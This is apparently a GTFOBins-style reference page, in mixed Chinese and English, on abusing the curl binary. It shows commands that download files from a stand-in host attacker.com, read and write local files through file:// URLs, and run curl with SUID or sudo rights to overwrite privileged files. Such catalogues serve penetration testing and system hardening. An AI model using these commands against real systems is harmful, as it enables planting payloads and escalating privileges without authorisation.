.. / curl

file-upload

上传文件到外部。

下载远程文件。

Fetch a remote file via HTTP GET request.

URL=http://attacker.com/file_to_get
LFILE=file_to_save
curl $URL -o $LFILE

从文件中读取数据。

The file path must be absolute.

LFILE=/tmp/要读取的文件路径
curl file://$LFILE

将数据写入文件中。

The file path must be absolute.

LFILE=要写入的文件
TF=$(mktemp)
echo DATA >$TF
curl "file://$TF" -o "$LFILE"

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

Fetch a remote file via HTTP GET request.

URL=http://attacker.com/file_to_get
LFILE=file_to_save
./curl $URL -o $LFILE

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

Fetch a remote file via HTTP GET request.

URL=http://attacker.com/file_to_get
LFILE=file_to_save
sudo curl $URL -o $LFILE